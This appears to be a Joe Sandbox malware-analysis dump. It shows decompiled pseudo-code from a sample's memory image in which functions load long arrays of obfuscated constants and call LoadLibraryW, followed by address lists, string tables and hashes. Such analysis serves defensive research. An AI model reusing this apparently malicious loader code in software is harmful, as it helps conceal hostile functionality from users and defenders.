				 *((intOrPtr*)(_t468 - 0x88)) = 0x40746a29;
				 *((intOrPtr*)(_t468 - 0x84)) = 0xb899ade9;
				 *((intOrPtr*)(_t468 - 0x80)) = 0xf8e96291;
				 *((intOrPtr*)(_t468 - 0x7c)) = 0xcd369cbd;
				 *((intOrPtr*)(_t468 - 0x78)) = 0xd578837e;
				 *((intOrPtr*)(_t468 - 0x74)) = 0x7bfad1c8;
				 *((intOrPtr*)(_t468 - 0x70)) = 0x2a892418;
				 *((intOrPtr*)(_t468 - 0x6c)) = 0x787daf4f;
				 *((intOrPtr*)(_t468 - 0x68)) = 0x63ab001f;
				 *((intOrPtr*)(_t468 - 0x64)) = 0x56953a11;
				 *((intOrPtr*)(_t468 - 0x60)) = 0xb152f6fe;
				 *((intOrPtr*)(_t468 - 0x5c)) = 0x32d5519c;
				 *((intOrPtr*)(_t468 - 0x58)) = 0xa3557b9d;
				 *((intOrPtr*)(_t468 - 0x54)) = 0x3e1e42a3;
				 *((intOrPtr*)(_t468 - 0x50)) = 0xd4f589b5;
				 *((intOrPtr*)(_t468 - 0x4c)) = 0xf487afca;
				 *((intOrPtr*)(_t468 - 0x48)) = 0x5232a7ec;
				 *((intOrPtr*)(_t468 - 0x44)) = 0xa7af87bc;
				 *((intOrPtr*)(_t468 - 0x40)) = 0xfaecb4e9;
				 *((intOrPtr*)(_t468 - 0x3c)) = 0x3ce6583a;
				 *((intOrPtr*)(_t468 - 0x38)) = 0x54c9160f;
				 *((intOrPtr*)(_t468 - 0x34)) = 0x7a2e6385;
				 *((intOrPtr*)(_t468 - 0x30)) = 0x52f8d07a;
				 *((intOrPtr*)(_t468 - 0x2c)) = 0x203b1ea1;
				 *((intOrPtr*)(_t468 - 0x28)) = 0x2d3d57d3;
				 *((intOrPtr*)(_t468 - 0x24)) = 0xfad6afe;
				 *((intOrPtr*)(_t468 - 0x20)) = 0xee3f4cb7;
				 *((intOrPtr*)(_t468 - 0x1c)) = 0xf1d7db08;
				 *((intOrPtr*)(_t468 - 0x18)) = 0x6820cb60;
				 *((intOrPtr*)(_t468 - 0x14)) = 0xd984d399;
				 *((intOrPtr*)(_t468 - 0x10)) = 0x8f097128;
				 *((intOrPtr*)(_t468 - 0xc)) = 0x977bfb06;
				 *((intOrPtr*)(_t468 - 8)) = 0xb12e09a4;
				 *((intOrPtr*)(_t468 - 4)) = 0xa9208ddd;
				_t466 = L041D1D10(0x41e3340, 0x2c, __edi, __esi);
				 *0x41e71f0 = LoadLibraryW(_t454);
				L041D1DB0(_t466);
				return E041D1570(_t458,  *0x41e71f0, _t468 - 0x710, _t466, 0x1c4, 0x75bf0e7d, 0x41e63a0);
			}

0x041da78a
0x041da78a
0x041da794
0x041da79e
0x041da7a8
0x041da7b2
0x041da7bc
0x041da7c6
0x041da7d0
0x041da7da
0x041da7e4
0x041da7ee
0x041da7f8
0x041da802
0x041da80c
0x041da816
0x041da820
0x041da82a
0x041da834
0x041da83e
0x041da848
0x041da852
0x041da85c
0x041da866
0x041da870
0x041da87a
0x041da884
0x041da88e
0x041da898
0x041da8a2
0x041da8ac
0x041da8b6
0x041da8c0
0x041da8ca
0x041da8d4
0x041da8de
0x041da8e8
0x041da8f2
0x041da8fc
0x041da906
0x041da910
0x041da91a
0x041da924
0x041da92e
0x041da938
0x041da942
0x041da94c
0x041da956
0x041da960
0x041da96a
0x041da974
0x041da97e
0x041da988
0x041da992
0x041da99c
0x041da9a6
0x041da9b0
0x041da9ba
0x041da9c4
0x041da9ce
0x041da9d8
0x041da9e2
0x041da9ec
0x041da9f6
0x041daa00
0x041daa0a
0x041daa14
0x041daa1e
0x041daa28
0x041daa32
0x041daa3c
0x041daa46
0x041daa50
0x041daa5a
0x041daa64
0x041daa6e
0x041daa78
0x041daa82
0x041daa8c
0x041daa96
0x041daaa0
0x041daaaa
0x041daab4
0x041daabe
0x041daac8
0x041daad2
0x041daadc
0x041daae6
0x041daaf0
0x041daafa
0x041dab04
0x041dab0e
0x041dab18
0x041dab22
0x041dab2c
0x041dab36
0x041dab40
0x041dab4a
0x041dab54
0x041dab5e
0x041dab68
0x041dab72
0x041dab7c
0x041dab86
0x041dab90
0x041dab9a
0x041daba4
0x041dabae
0x041dabb8
0x041dabc2
0x041dabcc
0x041dabd6
0x041dabe0
0x041dabea
0x041dabf4
0x041dabfe
0x041dac08
0x041dac12
0x041dac1c
0x041dac26
0x041dac30
0x041dac3a
0x041dac44
0x041dac4e
0x041dac58
0x041dac62
0x041dac6c
0x041dac76
0x041dac80
0x041dac8a
0x041dac94
0x041dac9e
0x041daca8
0x041dacb2
0x041dacbc
0x041dacc6
0x041dacd0
0x041dacda
0x041dace4
0x041dacee
0x041dacf8
0x041dad02
0x041dad0c
0x041dad16
0x041dad20
0x041dad2a
0x041dad34
0x041dad3e
0x041dad48
0x041dad52
0x041dad5c
0x041dad66
0x041dad70
0x041dad7a
0x041dad84
0x041dad8e
0x041dad98
0x041dada2
0x041dadac
0x041dadb6
0x041dadc0
0x041dadca
0x041dadd4
0x041dadde
0x041dade8
0x041dadf2
0x041dadfc
0x041dae06
0x041dae10
0x041dae1a
0x041dae24
0x041dae2e
0x041dae38
0x041dae42
0x041dae4c
0x041dae56
0x041dae60
0x041dae6a
0x041dae74
0x041dae7e
0x041dae88
0x041dae92
0x041dae9c
0x041daea6
0x041daeb0
0x041daeba
0x041daec4
0x041daece
0x041daed8
0x041daee2
0x041daeec
0x041daef6
0x041daf00
0x041daf0a
0x041daf14
0x041daf1e
0x041daf28
0x041daf32
0x041daf3c
0x041daf46
0x041daf50
0x041daf5a
0x041daf64
0x041daf6e
0x041daf78
0x041daf82
0x041daf8c
0x041daf96
0x041dafa0
0x041dafaa
0x041dafb4
0x041dafbe
0x041dafc8
0x041dafd2
0x041dafdc
0x041dafe6
0x041daff0
0x041daffa
0x041db004
0x041db00e
0x041db018
0x041db022
0x041db02c
0x041db036
0x041db040
0x041db04a
0x041db054
0x041db05e
0x041db068
0x041db072
0x041db07c
0x041db086
0x041db090
0x041db09a
0x041db0a4
0x041db0ae
0x041db0b8
0x041db0c2
0x041db0cc
0x041db0d6
0x041db0e0
0x041db0ea
0x041db0f4
0x041db0fe
0x041db108
0x041db112
0x041db11c
0x041db126
0x041db130
0x041db13a
0x041db144
0x041db14e
0x041db158
0x041db162
0x041db16c
0x041db176
0x041db180
0x041db18a
0x041db194
0x041db19e
0x041db1a8
0x041db1b2
0x041db1bc
0x041db1c6
0x041db1d0
0x041db1da
0x041db1e4
0x041db1ee
0x041db1f8
0x041db202
0x041db20c
0x041db216
0x041db220
0x041db22a
0x041db234
0x041db23e
0x041db248
0x041db252
0x041db25c
0x041db266
0x041db270
0x041db27a
0x041db284
0x041db28e
0x041db298
0x041db2a2
0x041db2ac
0x041db2b6
0x041db2c0
0x041db2ca
0x041db2d4
0x041db2de
0x041db2e8
0x041db2f2
0x041db2fc
0x041db306
0x041db310
0x041db31a
0x041db324
0x041db32e
0x041db338
0x041db342
0x041db34c
0x041db356
0x041db360
0x041db36a
0x041db374
0x041db37e
0x041db388
0x041db392
0x041db39c
0x041db3a6
0x041db3b0
0x041db3ba
0x041db3c4
0x041db3ce
0x041db3d8
0x041db3e2
0x041db3ec
0x041db3f6
0x041db400
0x041db40a
0x041db414
0x041db41e
0x041db428
0x041db432
0x041db43c
0x041db446
0x041db450
0x041db45a
0x041db464
0x041db46e
0x041db478
0x041db482
0x041db48c
0x041db496
0x041db4a0
0x041db4aa
0x041db4b4
0x041db4be
0x041db4c8
0x041db4d2
0x041db4dc
0x041db4e6
0x041db4f0
0x041db4fa
0x041db504
0x041db50e
0x041db518
0x041db522
0x041db52c
0x041db536
0x041db540
0x041db54a
0x041db554
0x041db55e
0x041db568
0x041db572
0x041db57c
0x041db586
0x041db590
0x041db59a
0x041db5a4
0x041db5ae
0x041db5b8
0x041db5c2
0x041db5cc
0x041db5d6
0x041db5e0
0x041db5ea
0x041db5f4
0x041db5fe
0x041db608
0x041db612
0x041db61c
0x041db626
0x041db630
0x041db63a
0x041db644
0x041db64e
0x041db658
0x041db662
0x041db66c
0x041db676
0x041db680
0x041db68a
0x041db694
0x041db69e
0x041db6a8
0x041db6b2
0x041db6bc
0x041db6c6
0x041db6d0
0x041db6da
0x041db6e4
0x041db6ee
0x041db6f8
0x041db702
0x041db70c
0x041db716
0x041db720
0x041db72a
0x041db734
0x041db73e
0x041db748
0x041db752
0x041db75c
0x041db76b
0x041db775
0x041db77f
0x041db789
0x041db793
0x041db79d
0x041db7a7
0x041db7b1
0x041db7bb
0x041db7c5
0x041db7cf
0x041db7d9
0x041db7e3
0x041db7ed
0x041db7f7
0x041db801
0x041db808
0x041db80f
0x041db816
0x041db81d
0x041db824
0x041db82b
0x041db832
0x041db839
0x041db840
0x041db847
0x041db84e
0x041db855
0x041db85c
0x041db863
0x041db86a
0x041db871
0x041db878
0x041db87f
0x041db886
0x041db88d
0x041db894
0x041db89b
0x041db8a2
0x041db8a9
0x041db8b0
0x041db8b7
0x041db8be
0x041db8c5
0x041db8cc
0x041db8d3
0x041db8da
0x041db8e9
0x041db8f4
0x041db8f9
0x041db925

APIs

LoadLibraryW.KERNEL32(00000000), ref: 041DB8EC

Strings

%h(, xrefs: 041DB068
B"* , xrefs: 041DB374
WfP=, xrefs: 041DAF3C
/g=, xrefs: 041DA9BA
S1p, xrefs: 041DAA96
.ZI, xrefs: 041DAC4E
=z4, xrefs: 041DB45A
D=z, xrefs: 041DB5D6
7, xrefs: 041DB388
H D%, xrefs: 041DB55E
^a, xrefs: 041DAE7E
)jt@, xrefs: 041DB7ED
/Z7~, xrefs: 041DACEE
RN5`, xrefs: 041DAB90
7K3, xrefs: 041DB720
\1>, xrefs: 041DA7A8
ML-', xrefs: 041DB4B4
' #C, xrefs: 041DAE38
eJn}, xrefs: 041DB568
:X<, xrefs: 041DB878
7k/, xrefs: 041DB69E

Memory Dump Source

Source File: 00000000.00000002.655519273.00000000041D1000.00000020.00000001.sdmp, Offset: 041D0000, based on PE: true

Associated: 00000000.00000002.655514422.00000000041D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.655533816.00000000041E1000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.655540744.00000000041E2000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41d0000_emo.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: .ZI$\1>$' #C$)jt@$/Z7~$7$7k/$:X<$=z4$B"* $D=z$H D%$ML-'$RN5`$S1p$WfP=$eJn}$%h($/g=$7K3$^a
API String ID: 1029625771-1014736697
Opcode ID: c9a20b1303e3c1f696367b8fde88d4f076145cb86753669f73cd049d3dab4781
Instruction ID: ca65c3a0b325654b67036dfe6acb2338b4a8fe4f21a54beff8e888d6cad808fd
Opcode Fuzzy Hash: c9a20b1303e3c1f696367b8fde88d4f076145cb86753669f73cd049d3dab4781
Instruction Fuzzy Hash: 6782A6F48567698BEB759F429E8578DBA31BB51304F6086C8C19D3B214CB720BD2CF89

Uniqueness

Uniqueness Score: -1.00%

Function 041D72DA, Relevance: 28.3, APIs: 1, Strings: 15, Instructions: 266
libraryCOMMON

Download Yara Rule

C-Code - Quality: 99%

			E041D72DA(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t250;
				void* _t260;

				_t250 = __ebx;
				 *((intOrPtr*)(_t260 - 0x3d0)) = 0xce2afbd9;
				 *((intOrPtr*)(_t260 - 0x3cc)) = 0x84a72d7a;
				 *((intOrPtr*)(_t260 - 0x3c8)) = 0x432bcb70;
				 *((intOrPtr*)(_t260 - 0x3c4)) = 0xba5a060d;
				 *((intOrPtr*)(_t260 - 0x3c0)) = 0x63556d90;
				 *((intOrPtr*)(_t260 - 0x3bc)) = 0x2c964d49;
				 *((intOrPtr*)(_t260 - 0x3b8)) = 0xec0fa018;
				 *((intOrPtr*)(_t260 - 0x3b4)) = 0x445262cd;
				 *((intOrPtr*)(_t260 - 0x3b0)) = 0x554157b0;
				 *((intOrPtr*)(_t260 - 0x3ac)) = 0xd89c0ee8;
				 *((intOrPtr*)(_t260 - 0x3a8)) = 0xc3821b23;
				 *((intOrPtr*)(_t260 - 0x3a4)) = 0x465f1a6d;
				 *((intOrPtr*)(_t260 - 0x3a0)) = 0xf5731f1a;
				 *((intOrPtr*)(_t260 - 0x39c)) = 0x97f4e754;
				 *((intOrPtr*)(_t260 - 0x398)) = 0x2fca7433;
				 *((intOrPtr*)(_t260 - 0x394)) = 0x3c49f32d;
				 *((intOrPtr*)(_t260 - 0x390)) = 0x5413e009;
				 *((intOrPtr*)(_t260 - 0x38c)) = 0x1e4824e7;
				 *((intOrPtr*)(_t260 - 0x388)) = 0x7e1394e1;
				 *((intOrPtr*)(_t260 - 0x384)) = 0x5464ebc2;
				 *((intOrPtr*)(_t260 - 0x380)) = 0x7f89ac54;
				 *((intOrPtr*)(_t260 - 0x37c)) = 0xd1926648;
				 *((intOrPtr*)(_t260 - 0x378)) = 0x60a8fd5f;
				 *((intOrPtr*)(_t260 - 0x374)) = 0x2c95feee;
				 *((intOrPtr*)(_t260 - 0x370)) = 0x9ee32203;
				 *((intOrPtr*)(_t260 - 0x36c)) = 0xf9fc329d;
				 *((intOrPtr*)(_t260 - 0x368)) = 0x2d748158;
				 *((intOrPtr*)(_t260 - 0x364)) = 0xbc44b53a;
				 *((intOrPtr*)(_t260 - 0x360)) = 0x77946b69;
				 *((intOrPtr*)(_t260 - 0x35c)) = 0x1b041b06;
				 *((intOrPtr*)(_t260 - 0x358)) = 0xe747cc98;
				 *((intOrPtr*)(_t260 - 0x354)) = 0xfe62811f;
				 *((intOrPtr*)(_t260 - 0x350)) = 0x36a45c02;
				 *((intOrPtr*)(_t260 - 0x34c)) = 0x2017824b;
				 *((intOrPtr*)(_t260 - 0x348)) = 0xcfd8cb2b;
				 *((intOrPtr*)(_t260 - 0x344)) = 0xe4c206bc;
				 *((intOrPtr*)(_t260 - 0x340)) = 0x90982c40;
				 *((intOrPtr*)(_t260 - 0x33c)) = 0x7e2f27e8;
				 *((intOrPtr*)(_t260 - 0x338)) = 0x5177d32d;
				 *((intOrPtr*)(_t260 - 0x334)) = 0x28ad99a7;
				 *((intOrPtr*)(_t260 - 0x330)) = 0xba4a8702;
				 *((intOrPtr*)(_t260 - 0x32c)) = 0x870442ee;
				 *((intOrPtr*)(_t260 - 0x328)) = 0x104afbf4;
				 *((intOrPtr*)(_t260 - 0x324)) = 0x62c3eec9;
				 *((intOrPtr*)(_t260 - 0x320)) = 0xada67e85;
				 *((intOrPtr*)(_t260 - 0x31c)) = 0xde34cf27;
				 *((intOrPtr*)(_t260 - 0x318)) = 0x3f10c50a;
				 *((intOrPtr*)(_t260 - 0x314)) = 0x11cec365;
				 *((intOrPtr*)(_t260 - 0x310)) = 0xe88be46e;
				 *((intOrPtr*)(_t260 - 0x30c)) = 0xfed5e034;
				 *((intOrPtr*)(_t260 - 0x308)) = 0x60959615;
				 *((intOrPtr*)(_t260 - 0x304)) = 0x643ef1a5;
				 *((intOrPtr*)(_t260 - 0x300)) = 0x550af26b;
				 *((intOrPtr*)(_t260 - 0x2fc)) = 0xc46bcb76;
				 *((intOrPtr*)(_t260 - 0x2f8)) = 0xcf0b9a40;
				 *((intOrPtr*)(_t260 - 0x2f4)) = 0xcad98d99;
				 *((intOrPtr*)(_t260 - 0x2f0)) = 0x6627d858;
				 *((intOrPtr*)(_t260 - 0x2ec)) = 0x9cac3ea0;
				 *((intOrPtr*)(_t260 - 0x2e8)) = 0x719155d6;
				 *((intOrPtr*)(_t260 - 0x2e4)) = 0x969a33e;
				 *((intOrPtr*)(_t260 - 0x2e0)) = 0xc988bee6;
				 *((intOrPtr*)(_t260 - 0x2dc)) = 0x53b9cd6;
				 *((intOrPtr*)(_t260 - 0x2d8)) = 0x43dc0666;
				 *((intOrPtr*)(_t260 - 0x2d4)) = 0xe36a7597;
				 *((intOrPtr*)(_t260 - 0x2d0)) = 0x7bfcb06e;
				 *((intOrPtr*)(_t260 - 0x2cc)) = 0x62c054df;
				 *((intOrPtr*)(_t260 - 0x2c8)) = 0xa78494a;
				 *((intOrPtr*)(_t260 - 0x2c4)) = 0xb33cf4dc;
				 *((intOrPtr*)(_t260 - 0x2c0)) = 0x897c764c;
				 *((intOrPtr*)(_t260 - 0x2bc)) = 0xb83435ae;
				 *((intOrPtr*)(_t260 - 0x2b8)) = 0xf718065c;
				 *((intOrPtr*)(_t260 - 0x2b4)) = 0xbe3b2098;
				 *((intOrPtr*)(_t260 - 0x2b0)) = 0xd906dec0;
				 *((intOrPtr*)(_t260 - 0x2ac)) = 0x251dd978;
				 *((intOrPtr*)(_t260 - 0x2a8)) = 0x7f535b3f;
				 *((intOrPtr*)(_t260 - 0x2a4)) = 0x856f95bc;
				 *((intOrPtr*)(_t260 - 0x2a0)) = 0x6d236b77;
				 *((intOrPtr*)(_t260 - 0x29c)) = 0x360f734a;
				 *((intOrPtr*)(_t260 - 0x298)) = 0x21acc3a3;
				 *((intOrPtr*)(_t260 - 0x294)) = 0x9c64e473;
				 *((intOrPtr*)(_t260 - 0x290)) = 0x16e54a7c;
				 *((intOrPtr*)(_t260 - 0x28c)) = 0xf3c1351b;
				 *((intOrPtr*)(_t260 - 0x288)) = 0x9f05b4bb;
				 *((intOrPtr*)(_t260 - 0x284)) = 0x695723a0;
				 *((intOrPtr*)(_t260 - 0x280)) = 0xf5911e67;
				 *((intOrPtr*)(_t260 - 0x27c)) = 0x967afa59;
				 *((intOrPtr*)(_t260 - 0x278)) = 0xa3f98fc0;
				 *((intOrPtr*)(_t260 - 0x274)) = 0x27ff086c;
				 *((intOrPtr*)(_t260 - 0x270)) = 0x9055bc0b;
				 *((intOrPtr*)(_t260 - 0x26c)) = 0xc9cc24b2;
				 *((intOrPtr*)(_t260 - 0x268)) = 0x45038e55;
				 *((intOrPtr*)(_t260 - 0x264)) = 0x84ed81d1;
				 *((intOrPtr*)(_t260 - 0x260)) = 0xe3b98093;
				 *((intOrPtr*)(_t260 - 0x25c)) = 0xae2c8429;
				 *((intOrPtr*)(_t260 - 0x258)) = 0xa2d3ced5;
				 *((intOrPtr*)(_t260 - 0x254)) = 0x9b3c56b6;
				 *((intOrPtr*)(_t260 - 0x250)) = 0x5d5a6374;
				 *((intOrPtr*)(_t260 - 0x24c)) = 0xc52b3542;
				 *((intOrPtr*)(_t260 - 0x248)) = 0x52ed06cf;
				 *((intOrPtr*)(_t260 - 0x244)) = 0x585568b3;
				 *((intOrPtr*)(_t260 - 0x240)) = 0x41a0ebd9;
				 *((intOrPtr*)(_t260 - 0x23c)) = 0x97c50e30;
				 *((intOrPtr*)(_t260 - 0x238)) = 0xed2b0824;
				 *((intOrPtr*)(_t260 - 0x234)) = 0x196e4813;
				 *((intOrPtr*)(_t260 - 0x230)) = 0x30ecbd56;
				 *((intOrPtr*)(_t260 - 0x22c)) = 0x6ef21dcf;
				 *((intOrPtr*)(_t260 - 0x228)) = 0x4733d23e;
				 *((intOrPtr*)(_t260 - 0x224)) = 0xd0edffac;
				 *((intOrPtr*)(_t260 - 0x220)) = 0x5c9c8ee8;
				 *((intOrPtr*)(_t260 - 0x21c)) = 0xf3b6dc77;
				 *((intOrPtr*)(_t260 - 0x218)) = 0x1b3fc9a6;
				 *((intOrPtr*)(_t260 - 0x214)) = 0x2c66f35b;
				 *((intOrPtr*)(_t260 - 0x210)) = 0x30f0cdcc;
				 *((intOrPtr*)(_t260 - 0x20c)) = 0x48fb4774;
				 *((intOrPtr*)(_t260 - 0x208)) = 0x11e586db;
				 *((intOrPtr*)(_t260 - 0x204)) = 0xce47fbe2;
				 *((intOrPtr*)(_t260 - 0x200)) = 0x20d1386d;
				 *((intOrPtr*)(_t260 - 0x1fc)) = 0x49198781;
				 *((intOrPtr*)(_t260 - 0x1f8)) = 0x6b83a25c;
				 *((intOrPtr*)(_t260 - 0x1f4)) = 0x57458aa6;
				 *((intOrPtr*)(_t260 - 0x1f0)) = 0x620e8221;
				 *((intOrPtr*)(_t260 - 0x1ec)) = 0x7f8eb057;
				 *((intOrPtr*)(_t260 - 0x1e8)) = 0x14d63aba;
				 *((intOrPtr*)(_t260 - 0x1e4)) = 0xbbc79d11;
				 *((intOrPtr*)(_t260 - 0x1e0)) = 0x4cfeb75;
				 *((intOrPtr*)(_t260 - 0x1dc)) = 0x3b640aef;
				 *((intOrPtr*)(_t260 - 0x1d8)) = 0x644e9699;
				 *((intOrPtr*)(_t260 - 0x1d4)) = 0x7298eaff;
				 *((intOrPtr*)(_t260 - 0x1d0)) = 0x928161fe;
				 *((intOrPtr*)(_t260 - 0x1cc)) = 0xc312c3c;
				 *((intOrPtr*)(_t260 - 0x1c8)) = 0xc1662dd8;
				 *((intOrPtr*)(_t260 - 0x1c4)) = 0xfdee131b;
				 *((intOrPtr*)(_t260 - 0x1c0)) = 0x38fffc1f;
				 *((intOrPtr*)(_t260 - 0x1bc)) = 0xc16b3a8;
				 *((intOrPtr*)(_t260 - 0x1b8)) = 0xbb5ffc8e;
				 *((intOrPtr*)(_t260 - 0x1b4)) = 0x5c3b4939;
				 *((intOrPtr*)(_t260 - 0x1b0)) = 0xb1fc49db;
				 *((intOrPtr*)(_t260 - 0x1ac)) = 0x402f0bd1;
				 *((intOrPtr*)(_t260 - 0x1a8)) = 0xfcb5dc7d;
				 *((intOrPtr*)(_t260 - 0x1a4)) = 0x5ca247b2;
				 *((intOrPtr*)(_t260 - 0x1a0)) = 0x73fe52be;
				 *((intOrPtr*)(_t260 - 0x19c)) = 0x7a9e3e02;
				 *((intOrPtr*)(_t260 - 0x198)) = 0xa566bbe0;
				 *((intOrPtr*)(_t260 - 0x194)) = 0xffcdd0c0;
				 *((intOrPtr*)(_t260 - 0x190)) = 0xcbaa9251;
				 *((intOrPtr*)(_t260 - 0x18c)) = 0xf9b99e57;
				 *((intOrPtr*)(_t260 - 0x188)) = 0xd6378a61;
				 *((intOrPtr*)(_t260 - 0x184)) = 0x876785cd;
				 *((intOrPtr*)(_t260 - 0x180)) = 0x80bd6360;
				 *((intOrPtr*)(_t260 - 0x17c)) = 0xd058e866;
				 *((intOrPtr*)(_t260 - 0x178)) = 0x1c09175;
				 *((intOrPtr*)(_t260 - 0x174)) = 0xd06cbc7f;
				 *((intOrPtr*)(_t260 - 0x170)) = 0xfa46634c;
				 *((intOrPtr*)(_t260 - 0x16c)) = 0xab9f3310;
				 *((intOrPtr*)(_t260 - 0x168)) = 0x3320504c;
				 *((intOrPtr*)(_t260 - 0x164)) = 0x39bd3a35;
				 *((intOrPtr*)(_t260 - 0x160)) = 0xcf0431e8;
				 *((intOrPtr*)(_t260 - 0x15c)) = 0x44e75687;
				 *((intOrPtr*)(_t260 - 0x158)) = 0x5d02babc;
				 *((intOrPtr*)(_t260 - 0x154)) = 0x36e4c841;
				 *((intOrPtr*)(_t260 - 0x150)) = 0x1a717f34;
				 *((intOrPtr*)(_t260 - 0x14c)) = 0x76233ba6;
				 *((intOrPtr*)(_t260 - 0x148)) = 0x641e037b;
				 *((intOrPtr*)(_t260 - 0x144)) = 0xdc60e25f;
				 *((intOrPtr*)(_t260 - 0x140)) = 0xd166dc17;
				 *((intOrPtr*)(_t260 - 0x13c)) = 0x3e0d6f7e;
				 *((intOrPtr*)(_t260 - 0x138)) = 0xbf23c374;
				 *((intOrPtr*)(_t260 - 0x134)) = 0x7f0fd1e2;
				 *((intOrPtr*)(_t260 - 0x130)) = 0xcae8e8de;
				 *((intOrPtr*)(_t260 - 0x12c)) = 0x113529f7;
				 *((intOrPtr*)(_t260 - 0x128)) = 0xb593323b;
				 *((intOrPtr*)(_t260 - 0x124)) = 0x74f24c4a;
				 *((intOrPtr*)(_t260 - 0x120)) = 0xabfbda06;
				 *((intOrPtr*)(_t260 - 0x11c)) = 0x9d7cc562;
				 *((intOrPtr*)(_t260 - 0x118)) = 0x7682291a;
				 *((intOrPtr*)(_t260 - 0x114)) = 0x3efc836d;
				 *((intOrPtr*)(_t260 - 0x110)) = 0xeff202b5;
				 *((intOrPtr*)(_t260 - 0x10c)) = 0xa024d2de;
				 *((intOrPtr*)(_t260 - 0x108)) = 0x716bc4f7;
				 *((intOrPtr*)(_t260 - 0x104)) = 0xa5f220fc;
				 *((intOrPtr*)(_t260 - 0x100)) = 0x3c92fb08;
				 *((intOrPtr*)(_t260 - 0xfc)) = 0x7d234322;
				 *((intOrPtr*)(_t260 - 0xf8)) = 0x92df187;
				 *((intOrPtr*)(_t260 - 0xf4)) = 0x209496a6;
				 *((intOrPtr*)(_t260 - 0xf0)) = 0xe08cdb79;
				 *((intOrPtr*)(_t260 - 0xec)) = 0x460ab09f;
				 *((intOrPtr*)(_t260 - 0xe8)) = 0x8431afb3;
				 *((intOrPtr*)(_t260 - 0xe4)) = 0xe16e402f;
				 *((intOrPtr*)(_t260 - 0xe0)) = 0xe55b4033;
				 *((intOrPtr*)(_t260 - 0xdc)) = 0xca8b028c;
				 *((intOrPtr*)(_t260 - 0xd8)) = 0x5c8c3731;
				 *((intOrPtr*)(_t260 - 0xd4)) = 0x3b4e0b2b;
				 *((intOrPtr*)(_t260 - 0xd0)) = 0x4c1ea806;
				 *((intOrPtr*)(_t260 - 0xcc)) = 0x34207724;
				 *((intOrPtr*)(_t260 - 0xc8)) = 0x73cc8bb8;
				 *((intOrPtr*)(_t260 - 0xc4)) = 0x175b4314;
				 *((intOrPtr*)(_t260 - 0xc0)) = 0x1f3d713d;
				 *((intOrPtr*)(_t260 - 0xbc)) = 0xb4b15693;
				 *((intOrPtr*)(_t260 - 0xb8)) = 0xa21373f2;
				 *((intOrPtr*)(_t260 - 0xb4)) = 0xf343a957;
				 *((intOrPtr*)(_t260 - 0xb0)) = 0x85b2f400;
				 *((intOrPtr*)(_t260 - 0xac)) = 0x5111c673;
				 *((intOrPtr*)(_t260 - 0xa8)) = 0xcad6892c;
				 *((intOrPtr*)(_t260 - 0xa4)) = 0x5394a64b;
				 *((intOrPtr*)(_t260 - 0xa0)) = 0xc4f571e9;
				 *((intOrPtr*)(_t260 - 0x9c)) = 0x420ec3d0;
				 *((intOrPtr*)(_t260 - 0x98)) = 0x518cf580;
				 *((intOrPtr*)(_t260 - 0x94)) = 0x30ba759b;
				 *((intOrPtr*)(_t260 - 0x90)) = 0xf86f0bff;
				 *((intOrPtr*)(_t260 - 0x8c)) = 0x3464e92f;
				 *((intOrPtr*)(_t260 - 0x88)) = 0x60db085b;
				 *((intOrPtr*)(_t260 - 0x84)) = 0xda6f280c;
				 *((intOrPtr*)(_t260 - 0x80)) = 0xfac86996;
				 *((intOrPtr*)(_t260 - 0x7c)) = 0x8506f489;
				 *((intOrPtr*)(_t260 - 0x78)) = 0xb4e65cce;
				 *((intOrPtr*)(_t260 - 0x74)) = 0xff0acc54;
				 *((intOrPtr*)(_t260 - 0x70)) = 0xedec65e4;
				 *((intOrPtr*)(_t260 - 0x6c)) = 0x93b9d98a;
				 *((intOrPtr*)(_t260 - 0x68)) = 0xe88825c0;
				 *((intOrPtr*)(_t260 - 0x64)) = 0xaeb87994;
				 *((intOrPtr*)(_t260 - 0x60)) = 0x34c4e12d;
				 *((intOrPtr*)(_t260 - 0x5c)) = 0x13bf4fba;
				 *((intOrPtr*)(_t260 - 0x58)) = 0xe5103a3c;
				 *((intOrPtr*)(_t260 - 0x54)) = 0x6bfebd55;
				 *((intOrPtr*)(_t260 - 0x50)) = 0xefb5c235;
				 *((intOrPtr*)(_t260 - 0x4c)) = 0xb892aa02;
				 *((intOrPtr*)(_t260 - 0x48)) = 0xda09bd81;
				 *((intOrPtr*)(_t260 - 0x44)) = 0xfb1444c6;
				 *((intOrPtr*)(_t260 - 0x40)) = 0x20d651c0;
				 *((intOrPtr*)(_t260 - 0x3c)) = 0x1cbbae38;
				 *((intOrPtr*)(_t260 - 0x38)) = 0xcadd6033;
				 *((intOrPtr*)(_t260 - 0x34)) = 0xf33dff32;
				 *((intOrPtr*)(_t260 - 0x30)) = 0x8b96e691;
				 *((intOrPtr*)(_t260 - 0x2c)) = 0xb83bef30;
				 *((intOrPtr*)(_t260 - 0x28)) = 0x1186dcfe;
				 *((intOrPtr*)(_t260 - 0x24)) = 0x3f575fbf;
				 *((intOrPtr*)(_t260 - 0x20)) = 0x77ad60e4;
				 *((intOrPtr*)(_t260 - 0x1c)) = 0x3f603246;
				 *((intOrPtr*)(_t260 - 0x18)) = 0x85886303;
				 *((intOrPtr*)(_t260 - 0x14)) = 0x1e586d0c;
				 *((intOrPtr*)(_t260 - 0x10)) = 0x7e399f5;
				 *((intOrPtr*)(_t260 - 0xc)) = 0x69610564;
				_push(0x10f9141c);
				 *((intOrPtr*)(_t260 - 8)) = 0x7bea8ae4;
				 *((intOrPtr*)(_t260 - 4)) = 0xe702f469;
				_t258 = L041D1D10(0x41e2650, 0xc0, __edi, __esi);
				 *0x41e71dc = LoadLibraryW(_t246);
				L041D1DB0(_t258);
				return E041D1570(_t250,  *0x41e71dc, _t260 - 0x3d0, _t258, 0xf4, 0x23be3f7f, 0x41e5080);
			}

0x041d72da
0x041d72da
0x041d72e4
0x041d72ee
0x041d72f8
0x041d7302
0x041d730c
0x041d7316
0x041d7320
0x041d732a
0x041d7334
0x041d733e
0x041d7348
0x041d7352
0x041d735c
0x041d7366
0x041d7370
0x041d737a
0x041d7384
0x041d738e
0x041d7398
0x041d73a2
0x041d73ac
0x041d73b6
0x041d73c0
0x041d73ca
0x041d73d4
0x041d73de
0x041d73e8
0x041d73f2
0x041d73fc
0x041d7406
0x041d7410
0x041d741a
0x041d7424
0x041d742e
0x041d7438
0x041d7442
0x041d744c
0x041d7456
0x041d7460
0x041d746a
0x041d7474
0x041d747e
